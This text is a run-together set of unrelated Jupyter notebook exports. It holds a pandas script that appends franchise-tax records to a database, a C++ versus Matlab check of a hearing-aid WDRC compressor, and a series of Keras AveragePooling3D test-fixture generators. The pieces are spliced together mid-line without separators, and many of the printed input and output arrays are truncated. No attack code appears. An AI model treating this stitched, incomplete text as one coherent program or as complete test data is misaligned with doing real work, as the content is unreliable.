There are 0 records in sales tax permit date table.fran aka df_fran Checking table df with df data to make sure there are no duplicate taxpayer numbers* filtering new df_fran with data from the database* Checking data for df_fran and also adding a new column of today's date and time* Appending new companies (fran) to csv and Databasetry: df_fran = df_fran[~df_fran['Taxpayer_Number'].astype(int).isin(ftact_date_in_db['Taxpayer_Number'].astype(int))] if df_fran.size != 0: df_fran['DateTime'] = DateTimeSent print(f"There are {len(ftact_date_in_db)} data attributes in df_fran table from the database\n{len(df_fran)} new companies, based on tax payer number from filtered data df_fran") df_fran.to_sql(name='franchise_tax_info_date', con=engine, if_exists='append', index=False, chunksize=1000) print(f"df_fran to database append, completed") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'fran_{dateCSV}.csv, {len(df_fran)}, franchise_tax_info_date table, {len(ftact_date_in_db)}\n') f.close() else: print("No new data") f = open('HotelOccupancyTaxData/formattedData/DBUploadRecord.txt','a+') f.write(f'fran_{dateCSV}.csv, {len(df_fran)}, franchise_tax_info_date table, {len(ftact_date_in_db)}\n') f.close() except Exception as e: print(f"Something went wrong, df_fran was not able to append to database: {e}")There are 0 data attributes in df_fran table from the database 111888 new companies, based on tax payer number from filtered data df_fran df_fran to database append, completedTesting WDRC With 8000 Hz Signal C++ and Matlab Summary - Near Perfect MatchAs close as can be with C++ using 32-bit floats.# make Jupyter use the whole width of the browser from IPython.display import Image, display, HTML display(HTML("")) import sys sys.path.append('..') import numpy as np from mlab import call_matlab, generate_sine_waves, plot_fft from rtmha.elevenband import Wdrc11 import plotly.graph_objects as go inp = np.zeros(2048, dtype=np.float32) inp[0] = 1 g50 = np.array([ 30, 20, 25,2,15,20,0,0,0,0,0], np.float32) g80 = np.array([ 0,-10,-5, 0,0,0,0,0,-.1,-1,-10], np.float32) kneelow = np.ones(11) * 45 band_mpo = np.ones(11) * 120 AT = np.ones(11) * 10 RT = np.ones(11) * 100 min_phase=1 align=1 res = call_matlab(min_phase, align, inp, g50, g80, kneelow, band_mpo, AT, RT) res['g50'] res['g80'] res['alpha1'] res['c'] w = Wdrc11(g50, g80, kneelow, band_mpo, AT, RT, len(inp), min_phase, align) # just verifies the input parameters w.get_param() m, b, c, kneeup, alpha1, alpha2 = w.get_param_test() kneeup g50 = np.array([ 5, -0.001, 0, 0,0,0,0,0,0,0,0], np.float32) g80 = np.array([ 10,0,-0.001, 0,0,0,0,0,0,0,0], np.float32) res = call_matlab(min_phase, align, inp, g50, g80, kneelow, band_mpo, AT, RT) res['m'] res['alpha2'] w = Wdrc11(g50, g80, kneelow, band_mpo, AT, RT, len(inp), min_phase, align) m, b, c, kneeup, alpha1, alpha2 = w.get_param_test() m g80 kneeup alpha1AveragePooling3D **[pooling.AveragePooling3D.0] input 4x4x4x2, pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(290) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = 
format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.0'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197, -0.275646, 0.375308, -0.928722, -0.836727, -0.504007, -0.503397, -0.636099, 0.948482, -0.639661, -0.026878, -0.122643, -0.634018, -0.247016, 0.517246, -0.398639, 0.752174, -0.014633, -0.170534, -0.463453, -0.289716, 0[...]**[pooling.AveragePooling3D.1] input 4x4x4x2, pool_size=(2, 2, 2), strides=(1, 1, 1), padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 1, 1), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(291) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.1'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.803361, 0.348731, 0.30124, -0.168638, 0.516406, -0.258765, 0.297839, 0.993235, 0.958465, -0.273175, -0.704992, 0.261477, -0.301255, 0.263104, 0.678631, -0.644936, -0.029034, -0.320266, 0.307733, -0.479016, 0.608177, 0.034951, 0.456908, -0.929353, 0.594982, -0.243058, -0.524918, 0.455339, 0.034216, 0.356824, 0.63906, -0.259773, -0.084724, 0.248472, -0.608134, 0.0077, 0.400591, -0.960703, -0.247926, -0.774509, 0.496174, -0.319044, -0.324046, -0.616632, -0.322142, -0.472846, 0.171825, -0.030013, 0.992861, -0.645264, 0.524886, 0.673229, 0.883122, 0.25346, -0.706988, -0.654436, 0.918349, -0.139113, 0.742737, 0.338472, -0.812719, 0.860081, 0.003489, 0.667897, 0.362284, -0.283972, 0.995162, 0.67962, -0.700244, -0.137142, 0.045695, -0.450433, 0.929977, 0.157542, -0.720517, -0.939063, 0.295004, 0.308728, -0.094057, -0.374756, -0.400976, -0.539654, 0.27965, 0.977688, -0.361264, -0.027757, -0.67149, 0.57064, -0.861888, 0.616985, -0.027436, 0.40181, -0.30391, 0.9226[...]**[pooling.AveragePooling3D.2] input 4x5x2x3, pool_size=(2, 2, 2), strides=(2, 1, 1), padding='valid', 
data_format='channels_last'**data_in_shape = (4, 5, 2, 3) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(2, 1, 1), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(282) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.2'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 5, 2, 3) in: [-0.263147, -0.216555, -0.75766, -0.396007, 0.85243, 0.98415, -0.230197, -0.979579, 0.117628, -0.66833, 0.714058, -0.907302, -0.574249, 0.299573, 0.101165, 0.655872, -0.104788, 0.242064, -0.409262, -0.124059, 0.105687, -0.969325, -0.167941, 0.382377, 0.710487, 0.793042, 0.180663, -0.80231, 0.684253, -0.516992, 0.471203, -0.152325, 0.509501, 0.613742, -0.877379, 0.755416, 0.427677, 0.931956, 0.827636, -0.860685, 0.562326, -0.716081, 0.028046, 0.594422, -0.862333, 0.336131, 0.713855, 0.386247, -0.986659, 0.242413, 0.753777, -0.159358, 0.166548, -0.437388, 0.291152, -0.775555, 0.796086, -0.592021, -0.251661, 0.187174, 0.899283, 0.431861, -0.685273, -0.085991, -0.629026, -0.478334, 0.714983, 0.53745, -0.310438, 0.973848, -0.675219, 0.422743, -0.992263, 0.374017, -0.687462, -0.190455, -0.560081, 0.22484, -0.079631, 0.815275, 0.338641, -0.538279, -0.10891, -0.929005, 0.514762, 0.322038, 0.702195, -0.697122, 0.925468, -0.274158, 0.148379, 0.333239, 0.63072, -0.6529[...]**[pooling.AveragePooling3D.3] input 4x4x4x2, pool_size=(3, 3, 3), strides=None, padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=None, padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(283) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.3'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.19483, -0.346754, 0.281648, -0.656271, 0.588328, 0.864284, -0.661556, 0.344578, 0.534692, 0.187914, -0.172976, 0.100575, 0.287857, 0.151936, 0.679748, 0.137527, 0.726773, -0.503042, -0.902524, -0.895315, 0.870645, 0.792427, -0.102238, -0.748643, -0.048728, -0.025835, 0.358631, 0.804295, -0.300104, -0.99179, -0.699454, -0.943476, -0.448011, 0.628611, 0.060595, 0.716813, -0.33607, 0.549002, 0.810379, 0.074881, -0.689823, 0.17513, -0.975426, 0.961779, -0.030624, -0.914643, -0.735591, 0.031988, -0.554272, 0.253033, 0.73405, 0.426412, -0.361457, 0.787875, -0.266747, -0.166595, 0.922155, -0.04597, 
-0.465312, 0.157074, -0.201136, -0.004584, -0.158067, 0.244864, -0.495687, 0.416834, -0.583545, 0.654634, -0.318258, -0.709804, -0.393463, 0.589381, -0.900991, 0.266171, 0.955916, -0.6571, 0.990855, -0.078764, 0.609356, -0.526011, -0.902476, 0.040574, -0.045497, -0.110604, 0.035908, -0.91532, -0.170028, -0.02148, -0.994139, 0.020418, 0.989168, -0.802385, 0.353583, -0.[...]**[pooling.AveragePooling3D.4] input 4x4x4x2, pool_size=(3, 3, 3), strides=(3, 3, 3), padding='valid', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(3, 3, 3), padding='valid', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(284) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.4'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.691755, -0.79282, -0.953135, 0.756956, -0.736874, 0.171061, -0.801845, 0.588236, -0.884749, 0.06721, -0.585121, -0.546211, -0.605281, -0.998989, 0.309413, -0.260604, -0.123585, 0.168908, -0.179496, 0.657412, -0.973664, 0.146258, -0.851615, -0.320588, 0.375102, -0.048494, 0.822789, 0.063572, -0.956466, 0.083595, 0.121146, 0.789353, -0.815498, -0.056454, -0.472042, -0.423572, 0.460752, 0.784129, -0.964421, -0.02912, -0.194265, 0.17147, -0.336383, -0.785223, 0.978845, 0.88826, -0.498649, -0.958507, 0.055052, -0.991654, -0.027882, 0.079693, 0.901998, 0.036266, -0.73015, -0.472116, 0.651073, 0.821196, 0.562183, 0.42342, -0.236111, 0.661076, -0.983951, -0.116893, -0.179815, 0.375962, -0.018703, -0.242038, -0.561415, 0.322072, 0.468695, 0.768235, -0.354887, 0.528139, 0.796988, -0.976979, 0.279858, -0.790546, 0.485339, 0.693701, -0.130412, 0.211269, -0.346429, 0.06497, 0.932512, -0.675758, -0.636085, 0.065187, -0.720225, -0.060809, -0.783716, -0.1708, 0.256143, 0[...]**[pooling.AveragePooling3D.5] input 4x4x4x2, pool_size=(2, 2, 2), strides=None, padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(285) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.5'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.495196, -0.886872, 0.220815, 0.126844, 0.168234, -0.640849, 0.457897, -0.375014, 0.001134, -0.486501, -0.819617, -0.468351, 
0.15859, 0.39238, -0.590545, -0.402922, 0.821619, -0.208255, -0.512219, -0.586151, -0.365648, -0.195611, -0.280978, -0.08818, -0.449229, 0.169082, 0.075074, -0.719751, 0.657827, -0.060862, -0.217533, 0.907503, 0.902317, 0.613945, 0.670047, -0.808346, 0.060215, -0.446612, -0.710328, -0.018744, 0.348018, -0.294409, 0.623986, -0.216504, 0.270099, -0.216285, -0.433193, -0.197968, -0.829926, -0.93864, -0.901724, -0.388869, -0.658339, -0.931401, -0.654674, -0.469503, 0.970661, 0.008063, -0.751014, 0.519043, 0.197895, 0.959095, 0.875405, 0.700615, 0.301314, -0.980157, 0.275373, -0.082646, 0.100727, -0.027273, -0.322366, 0.26563, 0.668139, 0.890289, 0.854229, -0.85773, -0.07833, -0.319645, -0.948873, 0.403526, 0.683097, 0.174958, 0.926944, -0.418256, -0.406667, -0.333808, 0.102223, -0.00576, 0.182281, 0.979655, 0.230246, 0.422968, -0.381217[...]**[pooling.AveragePooling3D.6] input 4x4x4x2, pool_size=(2, 2, 2), strides=(1, 1, 1), padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 1, 1), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(286) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.6'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [-0.709952, -0.532913, -0.169956, -0.391538, 0.729034, -0.2004, -0.67324, -0.973672, 0.879975, -0.981827, -0.4828, -0.887985, 0.843364, 0.710745, -0.260613, 0.20082, 0.309563, 0.721671, -0.967848, -0.976471, -0.13058, 0.052684, 0.666494, -0.319759, -0.060338, 0.359151, -0.795562, 0.70488, 0.100816, 0.466479, 0.992415, 0.066527, -0.690663, -0.741365, -0.251801, -0.479328, 0.62187, 0.578729, 0.598481, 0.817115, -0.913801, -0.694569, 0.397726, -0.31274, 0.163147, 0.087004, -0.744957, -0.920201, 0.440377, -0.191648, -0.227724, -0.562736, -0.484598, -0.230876, 0.019055, 0.988723, 0.656988, 0.185623, -0.629304, -0.321252, 0.329452, 0.355461, 0.734458, 0.496983, 0.181439, 0.414232, 0.776873, 0.68191, -0.846744, -0.442164, -0.526272, 0.92696, -0.704629, -0.800248, 0.643923, 0.775996, -0.203863, -0.756864, -0.398058, -0.914275, 0.980404, 0.329099, -0.576086, 0.851052, -0.74133, -0.23673, -0.001628, 0.972916, -0.571033, 0.669151, -0.977945, -0.707472, 0.371069, -0.772[...]**[pooling.AveragePooling3D.7] input 4x5x4x2, pool_size=(2, 2, 2), strides=(1, 2, 1), padding='same', data_format='channels_last'**data_in_shape = (4, 5, 4, 2) L = AveragePooling3D(pool_size=(2, 2, 2), strides=(1, 2, 1), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(287) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = 
format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.7'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 5, 4, 2) in: [-0.71103, 0.421506, 0.752321, 0.542455, -0.557162, -0.963774, 0.910303, -0.933284, 0.67521, 0.588709, -0.782848, -0.108964, -0.767069, 0.338318, -0.660374, -0.967294, -0.501079, -0.917532, -0.087991, -0.160473, 0.520493, 0.612007, -0.955448, -0.809749, -0.627003, 0.494441, 0.985405, 0.99813, -0.278165, 0.090068, 0.803872, 0.287682, 0.162199, 0.1796, -0.630223, 0.044743, 0.9092, 0.023879, -0.403203, -0.005329, -0.29237, -0.510033, -0.190427, 0.149011, 0.873547, -0.58793, -0.302525, 0.102122, -0.804112, 0.965834, 0.302039, -0.806929, 0.627682, 0.876256, 0.176245, 0.051969, 0.005712, -0.877694, -0.776877, -0.360984, 0.172577, 0.953108, 0.755911, 0.973515, 0.745292, 0.765506, 0.119956, 0.378346, 0.425789, 0.048668, 0.363691, -0.499862, 0.315721, 0.243267, 0.333434, -0.001645, -0.007235, -0.463152, -0.002048, 0.862117, -0.575785, 0.594789, 0.068012, 0.165267, 0.081581, 0.128645, 0.559305, -0.494595, 0.10207, 0.278472, -0.815856, 0.817863, 0.101417, -0.432774, -0[...]**[pooling.AveragePooling3D.8] input 4x4x4x2, pool_size=(3, 3, 3), strides=None, padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = AveragePooling3D(pool_size=(3, 3, 3), strides=None, padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(288) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.8'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.106539, 0.430065, 0.625063, -0.956042, 0.681684, 0.345995, -0.589061, 0.186737, 0.535452, -0.125905, -0.396262, -0.44893, 0.39021, 0.253402, -0.238515, 0.337141, 0.178107, 0.244331, -0.93179, -0.081267, 0.895223, 0.820023, 0.365435, -0.738456, 0.893031, -0.787916, -0.518813, 0.661518, -0.464144, -0.639165, -0.252917, 0.784083, 0.577398, 0.769552, 0.036096, 0.847521, -0.171916, 0.07536, -0.830068, 0.734205, -0.437818, 0.295701, 0.252657, -0.859452, -0.425833, -0.650296, -0.584695, 0.163986, 0.43905, -0.521755, 0.620616, 0.066707, -0.101702, 0.941175, 0.479202, 0.624312, -0.372154, 0.625845, 0.980521, -0.834695, -0.40269, 0.784157, 0.814068, -0.485038, -0.150738, 0.682911, 0.406096, -0.405868, -0.337905, 0.803583, -0.764964, 0.96897, -0.057235, 0.403604, -0.605392, 0.389273, 0.235543, -0.095585, -0.860692, 0.937457, -0.928888, 0.702073, -0.18066, 0.033968, -0.082046, -0.237205, 0.922919, 0.064731, -0.026908, -0.865491, 0.881128, 0.265603, -0.132321, -0.7018[...]**[pooling.AveragePooling3D.9] input 4x4x4x2, pool_size=(3, 3, 3), strides=(3, 3, 3), padding='same', data_format='channels_last'**data_in_shape = (4, 4, 4, 2) L = 
AveragePooling3D(pool_size=(3, 3, 3), strides=(3, 3, 3), padding='same', data_format='channels_last') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(289) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.9'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (4, 4, 4, 2) in: [0.454263, 0.047178, -0.644362, 0.432654, 0.776147, -0.088086, -0.16527, -0.152361, -0.723283, 0.119471, -0.020663, 0.230897, 0.249349, -0.825224, 0.809245, 0.37136, 0.649976, 0.690981, -0.5766, 0.750394, -0.777363, -0.359006, 0.398419, -0.851015, -0.479232, -0.924962, -0.898893, 0.135445, 0.819369, -0.867218, 0.039715, 0.304805, -0.865872, -0.891635, 0.730554, 0.178083, 0.981329, 0.047786, -0.466968, -0.89441, -0.037018, -0.880158, 0.635061, 0.108217, 0.405675, 0.242025, 0.524396, -0.46013, -0.98454, 0.227442, -0.159924, -0.396205, -0.843265, 0.181395, -0.743803, 0.445469, 0.05215, 0.837067, -0.756402, -0.959109, -0.580594, -0.677936, -0.929683, -0.165592, -0.870784, 0.91887, 0.542361, 0.46359, -0.521332, 0.778263, 0.662447, 0.692057, 0.224535, -0.087731, 0.904644, 0.207457, -0.564079, -0.389642, 0.590403, -0.861828, -0.280471, -0.593786, -0.542645, 0.788946, -0.808773, -0.334536, -0.973711, 0.68675, 0.383992, -0.38838, 0.278601, -0.89188, -0.582918, -0.190[...]**[pooling.AveragePooling3D.10] input 2x3x3x4, pool_size=(3, 3, 3), strides=(2, 2, 2), padding='valid', data_format='channels_first'**data_in_shape = (2, 3, 3, 4) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(2, 2, 2), padding='valid', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(290) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.10'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (2, 3, 3, 4) in: [-0.453175, -0.475078, 0.486234, -0.949643, -0.349099, -0.837108, 0.933439, 0.167853, -0.995191, 0.459466, -0.788337, -0.120985, 0.06215, 0.138625, -0.102201, 0.976605, -0.591051, -0.592066, 0.469334, -0.435067, 0.621416, 0.817698, 0.790015, 0.485862, 0.469679, -0.611443, 0.582845, -0.503885, -0.379174, -0.451035, 0.052289, 0.131836, -0.609312, -0.828722, -0.422428, -0.648754, -0.339801, -0.758017, 0.754244, -0.544823, 0.691656, 0.076848, -0.32539, 0.306448, -0.662415, 0.334329, 0.030666, -0.414111, -0.757096, -0.20427, -0.893088, -0.681919, -0.619269, -0.640749, 0.867436, 0.971453, -0.42039, -0.574905, -0.34642, 0.588678, -0.247265, 0.436084, 
0.220126, 0.114202, 0.613623, 0.401452, -0.270262, -0.591146, -0.872383, 0.818368, 0.336808, 0.338197] out shape: (2, 1, 1, 1) out: [-0.096379, -0.08704]**[pooling.AveragePooling3D.11] input 2x3x3x4, pool_size=(3, 3, 3), strides=(1, 1, 1), padding='same', data_format='channels_first'**data_in_shape = (2, 3, 3, 4) L = AveragePooling3D(pool_size=(3, 3, 3), strides=(1, 1, 1), padding='same', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(291) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.11'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (2, 3, 3, 4) in: [-0.803361, 0.348731, 0.30124, -0.168638, 0.516406, -0.258765, 0.297839, 0.993235, 0.958465, -0.273175, -0.704992, 0.261477, -0.301255, 0.263104, 0.678631, -0.644936, -0.029034, -0.320266, 0.307733, -0.479016, 0.608177, 0.034951, 0.456908, -0.929353, 0.594982, -0.243058, -0.524918, 0.455339, 0.034216, 0.356824, 0.63906, -0.259773, -0.084724, 0.248472, -0.608134, 0.0077, 0.400591, -0.960703, -0.247926, -0.774509, 0.496174, -0.319044, -0.324046, -0.616632, -0.322142, -0.472846, 0.171825, -0.030013, 0.992861, -0.645264, 0.524886, 0.673229, 0.883122, 0.25346, -0.706988, -0.654436, 0.918349, -0.139113, 0.742737, 0.338472, -0.812719, 0.860081, 0.003489, 0.667897, 0.362284, -0.283972, 0.995162, 0.67962, -0.700244, -0.137142, 0.045695, -0.450433] out shape: (2, 3, 3, 4) out: [-0.073055, 0.083417, 0.109908, 0.160761, 0.061998, 0.11563, 0.00915, 0.030844, 0.154595, 0.132854, -0.051119, 0.025479, 0.01321, 0.103228, 0.096798, 0.132983, 0.091705, 0.092372, 0.008749, 0.00[...]**[pooling.AveragePooling3D.12] input 3x4x4x3, pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_first'**data_in_shape = (3, 4, 4, 3) L = AveragePooling3D(pool_size=(2, 2, 2), strides=None, padding='valid', data_format='channels_first') layer_0 = Input(shape=data_in_shape) layer_1 = L(layer_0) model = Model(inputs=layer_0, outputs=layer_1) # set weights to random (use seed for reproducibility) np.random.seed(292) data_in = 2 * np.random.random(data_in_shape) - 1 result = model.predict(np.array([data_in])) data_out_shape = result[0].shape data_in_formatted = format_decimal(data_in.ravel().tolist()) data_out_formatted = format_decimal(result[0].ravel().tolist()) print('') print('in shape:', data_in_shape) print('in:', data_in_formatted) print('out shape:', data_out_shape) print('out:', data_out_formatted) DATA['pooling.AveragePooling3D.12'] = { 'input': {'data': data_in_formatted, 'shape': data_in_shape}, 'expected': {'data': data_out_formatted, 'shape': data_out_shape} }in shape: (3, 4, 4, 3) in: [-0.497409, -0.250345, 0.196124, -0.044334, -0.324906, 0.560065, 0.220435, -0.167776, -0.923771, 0.77337, -0.862909, -0.584756, -0.70451, 0.870272, 0.841773, -0.312016, 0.599915, 0.073955, 0.944336, -0.4175, 0.865698, 0.609184, 0.033839, -0.72494, -0.239473, 0.514968, -0.318523, -0.244443, 0.275468, -0.85993, -0.262732, 0.026767, -0.937574, 
